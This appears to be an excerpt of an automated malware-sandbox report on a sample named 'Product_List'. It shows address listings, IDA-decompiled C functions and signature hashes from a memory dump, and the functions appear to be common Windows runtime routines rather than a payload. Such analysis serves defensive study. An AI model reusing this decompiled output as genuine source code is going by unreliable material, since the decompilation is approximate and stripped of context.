                                                      0x01762dd5
                                                      0x01762dde
                                                      0x01762de1
                                                      0x01762e70
                                                      0x01762e72
                                                      0x01762e72
                                                      0x01762de7
                                                      0x01762deb
                                                      0x01762e7c
                                                      0x01762e83
                                                      0x01762e85
                                                      0x01762e8b
                                                      0x01762e8d
                                                      0x01762e92
                                                      0x01762e92
                                                      0x01762e85
                                                      0x01762df1
                                                      0x01762df7
                                                      0x01762df9
                                                      0x01762df9
                                                      0x01762dfc
                                                      0x01762dff
                                                      0x01762e02
                                                      0x00000000
                                                      0x01762e05
                                                      0x01762e0c
                                                      0x017bf9d9
                                                      0x01762e12
                                                      0x01762e12
                                                      0x01762e12
                                                      0x01762e1a
                                                      0x017bf9e3
                                                      0x017bf9e9
                                                      0x017bf9f0
                                                      0x017bf9f6
                                                      0x017bf9f8
                                                      0x017bf9f8
                                                      0x017bf9f0
                                                      0x01762e23
                                                      0x017bfa02
                                                      0x017bfa03
                                                      0x017bfa05
                                                      0x017bfa06
                                                      0x00000000
                                                      0x01762e29
                                                      0x01762e29
                                                      0x01762e2e
                                                      0x01762e34
                                                      0x01762e3e
                                                      0x00000000
                                                      0x00000000
                                                      0x01762e44
                                                      0x01762e47
                                                      0x01762e4d
                                                      0x00000000
                                                      0x00000000
                                                      0x01762e4f
                                                      0x01762e54
                                                      0x00000000
                                                      0x00000000
                                                      0x01762e5a
                                                      0x01762e5f
                                                      0x01762e9a
                                                      0x01762ea4
                                                      0x01762ea5
                                                      0x01762ea8
                                                      0x01762eaf
                                                      0x01762eb2
                                                      0x01762eb5
                                                      0x017bfae9
                                                      0x017bfaeb
                                                      0x017bfaed
                                                      0x017bfaef
                                                      0x017bfaf7
                                                      0x017bfaf8
                                                      0x017bfafd
                                                      0x017bfaff
                                                      0x017bfb04
                                                      0x017bfb04
                                                      0x017bfaff
                                                      0x01762ec0
                                                      0x01762ec4
                                                      0x01762ec6
                                                      0x01762ec8
                                                      0x017bfb14
                                                      0x017bfb18
                                                      0x017bfb1e
                                                      0x017bfb21
                                                      0x017bfb21
                                                      0x01762ece
                                                      0x01762ece
                                                      0x01762ece
                                                      0x01762ed7
                                                      0x01762e61
                                                      0x01762e63
                                                      0x017bfa6b
                                                      0x017bfa71
                                                      0x017bfa76
                                                      0x017bfa78
                                                      0x017bfa8a
                                                      0x017bfa7a
                                                      0x017bfa83
                                                      0x017bfa83
                                                      0x017bfa8f
                                                      0x017bfa91
                                                      0x017bfa97
                                                      0x017bfa9d
                                                      0x017bfaa4
                                                      0x017bfaaa
                                                      0x017bfaaf
                                                      0x017bfab1
                                                      0x017bfac3
                                                      0x017bfab3
                                                      0x017bfabc
                                                      0x017bfabc
                                                      0x017bfac8
                                                      0x017bfacb
                                                      0x017bfadf
                                                      0x017bfadf
                                                      0x017bfacb
                                                      0x017bfaa4
                                                      0x017bfa91
                                                      0x01762e6f
                                                      0x01762e6f
                                                      0x01762e5f
                                                      0x017bfa13
                                                      0x017bfa15
                                                      0x017bfa17
                                                      0x017bfa1f
                                                      0x017bfa21
                                                      0x017bfa22
                                                      0x017bfa25
                                                      0x017bfa28
                                                      0x017bfa2f
                                                      0x017bfa2f
                                                      0x017bfa2a
                                                      0x017bfa2a
                                                      0x017bfa2a
                                                      0x017bfa31
                                                      0x017bfa34
                                                      0x017bfa36
                                                      0x017bfa3c
                                                      0x017bfa3e
                                                      0x017bfa41
                                                      0x017bfa43
                                                      0x017bfa45
                                                      0x017bfa45
                                                      0x017bfa41
                                                      0x017bfa3c
                                                      0x017bfa4a
                                                      0x017bfa4f
                                                      0x017bfa51
                                                      0x017bfa53
                                                      0x017bfa56
                                                      0x017bfa5b
                                                      0x017bfa5e
                                                      0x00000000
                                                      0x017bfa5e
                                                      0x01762e23

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: b732dfa79258d0028413c0a023405a1dfc7600d4577aae6ee48a8a20830d0a9a
                                                      • Instruction ID: a21594121ca9b12b0a902dcf76103482bc93328741f72ab77fe1b21b8e880277
                                                      • Opcode Fuzzy Hash: b732dfa79258d0028413c0a023405a1dfc7600d4577aae6ee48a8a20830d0a9a
                                                      • Instruction Fuzzy Hash: 43613971A00605AFDB36DF6CCC88BBEFBE9EB45B14F1446A9DA11972C2C7349A40C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E0179F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01784120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E017A9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E017A9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017A95D0();
							goto L11;
						} else {
							_t109 = L01784620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E017AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017A95D0();
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                      0x0179f0d3
                                                      0x0179f0d9
                                                      0x0179f0e0
                                                      0x0179f0e7
                                                      0x0179f0f2
                                                      0x0179f0f4
                                                      0x0179f0f8
                                                      0x0179f100
                                                      0x0179f108
                                                      0x0179f10d
                                                      0x0179f115
                                                      0x0179f116
                                                      0x0179f11f
                                                      0x0179f123
                                                      0x0179f124
                                                      0x0179f12c
                                                      0x0179f130
                                                      0x0179f134
                                                      0x0179f13d
                                                      0x0179f144
                                                      0x0179f14b
                                                      0x0179f152
                                                      0x017dbab0
                                                      0x017dbab0
                                                      0x0179f158
                                                      0x0179f158
                                                      0x0179f15a
                                                      0x0179f160
                                                      0x0179f165
                                                      0x0179f166
                                                      0x0179f16f
                                                      0x0179f173
                                                      0x017dbaa7
                                                      0x017dbaa7
                                                      0x017dbaab
                                                      0x00000000
                                                      0x0179f179
                                                      0x0179f18d
                                                      0x0179f191
                                                      0x017dbaa2
                                                      0x00000000
                                                      0x0179f197
                                                      0x0179f19b
                                                      0x0179f1a2
                                                      0x0179f1a9
                                                      0x0179f1af
                                                      0x0179f1b2
                                                      0x0179f1b6
                                                      0x0179f1b9
                                                      0x0179f1c4
                                                      0x0179f1d8
                                                      0x0179f1df
                                                      0x0179f1e3
                                                      0x0179f1eb
                                                      0x0179f1ee
                                                      0x0179f1f4
                                                      0x0179f20f
                                                      0x017dbab7
                                                      0x017dbabb
                                                      0x017dbacc
                                                      0x017dbad1
                                                      0x0179f215
                                                      0x0179f218
                                                      0x0179f226
                                                      0x0179f22b
                                                      0x00000000
                                                      0x0179f22b
                                                      0x0179f1f6
                                                      0x0179f1f6
                                                      0x0179f1f9
                                                      0x0179f1fb
                                                      0x0179f1fb
                                                      0x0179f1f4
                                                      0x0179f191
                                                      0x0179f173
                                                      0x0179f152
                                                      0x0179f203

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction ID: 7b4aac41e78cca59904e28043c7fb1f81da55422d6c8413e4b25c50dca35a941
                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction Fuzzy Hash: 2C516A71504711ABC320DF19C841A6BFBF8FF88714F108A29FA9587690E7B4E914CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E017E3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x185d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E017A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					L017E3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E017AFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E017E3540;
						E017AFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E017BDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E017F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						L017A97C0();
					}
					return L017AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E017E3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E017E3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E017AFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = L017A9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							L017E3787(_a4,  &_v352, _t80);
						}
					}
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017A95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                      0x017e3552
                                                      0x017e355a
                                                      0x017e355d
                                                      0x017e3566
                                                      0x017e3567
                                                      0x017e357e
                                                      0x017e358f
                                                      0x017e35a1
                                                      0x017e35a5
                                                      0x017e366b
                                                      0x017e366b
                                                      0x017e366d
                                                      0x017e3672
                                                      0x017e3679
                                                      0x017e3685
                                                      0x017e368d
                                                      0x017e369d
                                                      0x017e36a7
                                                      0x017e36b8
                                                      0x017e36c6
                                                      0x017e36c7
                                                      0x017e36dc
                                                      0x017e36e1
                                                      0x017e36e7
                                                      0x017e36e9
                                                      0x017e36e9
                                                      0x017e3703
                                                      0x017e3703
                                                      0x017e35b5
                                                      0x017e35c0
                                                      0x017e35c4
                                                      0x00000000
                                                      0x00000000
                                                      0x017e35ca
                                                      0x017e35d7
                                                      0x017e35e2
                                                      0x017e35e6
                                                      0x017e35e8
                                                      0x017e35f5
                                                      0x017e35fa
                                                      0x017e3603
                                                      0x017e3604
                                                      0x017e3609
                                                      0x017e360a
                                                      0x017e3612
                                                      0x017e3613
                                                      0x017e361e
                                                      0x017e3622
                                                      0x017e3628
                                                      0x017e362f
                                                      0x017e362f
                                                      0x017e3636
                                                      0x017e3638
                                                      0x017e363b
                                                      0x017e3642
                                                      0x017e3642
                                                      0x017e3636
                                                      0x017e3657
                                                      0x017e3657
                                                      0x017e365c
                                                      0x017e3662
                                                      0x017e3669
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: 0d06f8482ff9db466567a0994227df18f311e2c967471d76e1ae3599d23142dd
                                                      • Instruction ID: 95c922b543f05e33cd16802229e82c8077bea437f3125ef252c6268ecb1db44d
                                                      • Opcode Fuzzy Hash: 0d06f8482ff9db466567a0994227df18f311e2c967471d76e1ae3599d23142dd
                                                      • Instruction Fuzzy Hash: 3E4146B1D0052D9BDB21DA60CC88FDEF7BCAB44714F5045A5EB09AB240DB309E88CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 018305AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E018305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(L018307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(L017A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0182A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0182A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01831293(_t79, _v40, L018307DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01787D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0182138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                      0x018305c5
                                                      0x018305ca
                                                      0x018305d3
                                                      0x018306db
                                                      0x018306db
                                                      0x018306dd
                                                      0x018306e3
                                                      0x018306e3
                                                      0x018305dd
                                                      0x018305e7
                                                      0x018305f6
                                                      0x01830600
                                                      0x01830607
                                                      0x01830610
                                                      0x01830615
                                                      0x0183061a
                                                      0x0183061c
                                                      0x0183061e
                                                      0x01830624
                                                      0x01830625
                                                      0x01830627
                                                      0x01830628
                                                      0x01830631
                                                      0x01830640
                                                      0x0183064d
                                                      0x01830654
                                                      0x01830654
                                                      0x01830631
                                                      0x0183066d
                                                      0x01830674
                                                      0x00000000
                                                      0x00000000
                                                      0x01830692
                                                      0x0183069e
                                                      0x018306b0
                                                      0x018306a0
                                                      0x018306a9
                                                      0x018306a9
                                                      0x018306b8
                                                      0x018306d6
                                                      0x018306d6
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction ID: afd37b461528bf0b6a0c2aba86fd9095d47746df5ec789032dc0a6877ba28a62
                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction Fuzzy Hash: 7B31063220430A6BE711DE19CC44F977BD9EBC4754F184229FA54DB284E7B0EA04C7D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E017E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L017A9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01784620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L017A9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                      0x017e3893
                                                      0x017e3896
                                                      0x017e3899
                                                      0x017e389f
                                                      0x017e38a0
                                                      0x017e38a4
                                                      0x017e38a9
                                                      0x017e38ac
                                                      0x017e38ad
                                                      0x017e38ae
                                                      0x017e38af
                                                      0x017e38b1
                                                      0x017e38b4
                                                      0x017e38bb
                                                      0x017e38bc
                                                      0x017e38bd
                                                      0x017e38c4
                                                      0x017e38c8
                                                      0x017e38ca
                                                      0x017e38ca
                                                      0x017e38d5
                                                      0x017e393e
                                                      0x017e3940
                                                      0x017e3942
                                                      0x017e3952
                                                      0x017e3954
                                                      0x017e3961
                                                      0x017e3961
                                                      0x017e3967
                                                      0x017e396e
                                                      0x017e396e
                                                      0x017e3947
                                                      0x017e394c
                                                      0x00000000
                                                      0x017e394c
                                                      0x017e38ea
                                                      0x017e38ee
                                                      0x017e38f8
                                                      0x017e38f9
                                                      0x017e38ff
                                                      0x017e3900
                                                      0x017e3902
                                                      0x017e3903
                                                      0x017e390b
                                                      0x017e390f
                                                      0x017e3950
                                                      0x00000000
                                                      0x017e3950
                                                      0x017e3915
                                                      0x017e391d
                                                      0x017e391d
                                                      0x017e3922
                                                      0x017e3926
                                                      0x00000000
                                                      0x017e3928
                                                      0x017e392b
                                                      0x017e392b
                                                      0x017e3935
                                                      0x017e3937
                                                      0x017e3937
                                                      0x00000000
                                                      0x017e3935
                                                      0x017e3926
                                                      0x017e38f0
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: d1829f69eec6b08128401e2aebc6330d4ca4ae43bd25341784d66aa2d890ed6f
                                                      • Instruction ID: fb053276682a29d0925086eb0f081e23f70e3d17fbf1f070312b56bc452c83e2
                                                      • Opcode Fuzzy Hash: d1829f69eec6b08128401e2aebc6330d4ca4ae43bd25341784d66aa2d890ed6f
                                                      • Instruction Fuzzy Hash: A131E372D0151ABFEB15DA58C949E6FFBF4FF88B24F124169E915A7250D7309E00C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E0179D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x185d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01784120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L017AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017A98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017A95D0();
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                      0x0179d29c
                                                      0x0179d2a6
                                                      0x0179d2b1
                                                      0x0179d2b5
                                                      0x0179d2b6
                                                      0x0179d2bc
                                                      0x0179d2bd
                                                      0x0179d2be
                                                      0x0179d2bf
                                                      0x0179d2c2
                                                      0x0179d2c4
                                                      0x0179d2cc
                                                      0x0179d384
                                                      0x0179d34b
                                                      0x0179d34f
                                                      0x0179d350
                                                      0x0179d351
                                                      0x0179d35c
                                                      0x0179d35c
                                                      0x0179d2d6
                                                      0x0179d2da
                                                      0x0179d2e1
                                                      0x0179d361
                                                      0x0179d369
                                                      0x0179d36d
                                                      0x0179d2e3
                                                      0x0179d2e3
                                                      0x0179d2e3
                                                      0x0179d2e5
                                                      0x0179d2ed
                                                      0x0179d2f5
                                                      0x0179d2fa
                                                      0x0179d302
                                                      0x0179d303
                                                      0x0179d30b
                                                      0x0179d30f
                                                      0x0179d313
                                                      0x0179d318
                                                      0x0179d31c
                                                      0x0179d320
                                                      0x0179d379
                                                      0x0179d37d
                                                      0x00000000
                                                      0x00000000
                                                      0x017daffe
                                                      0x017db001
                                                      0x017db011
                                                      0x00000000
                                                      0x0179d322
                                                      0x0179d322
                                                      0x0179d330
                                                      0x0179d337
                                                      0x0179d35d
                                                      0x0179d339
                                                      0x0179d33f
                                                      0x0179d38c
                                                      0x0179d38c
                                                      0x0179d33f
                                                      0x0179d349
                                                      0x00000000
                                                      0x0179d349

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: cf89f0a15f9e6733ec8b5259550b14bc819361961fed61f1bc0ea02c2e0b93df
                                                      • Instruction ID: b443b85fc06c35f87b04566fc64800d12810a5392be0bc6403333c0f36772f72
                                                      • Opcode Fuzzy Hash: cf89f0a15f9e6733ec8b5259550b14bc819361961fed61f1bc0ea02c2e0b93df
                                                      • Instruction Fuzzy Hash: 4431E0B1548305DFCB21DF68D884A6BFBE8FBC9654F400A6EF99583210E634DD08CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01771B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E01771B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E017ABB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E017AA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E017AA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
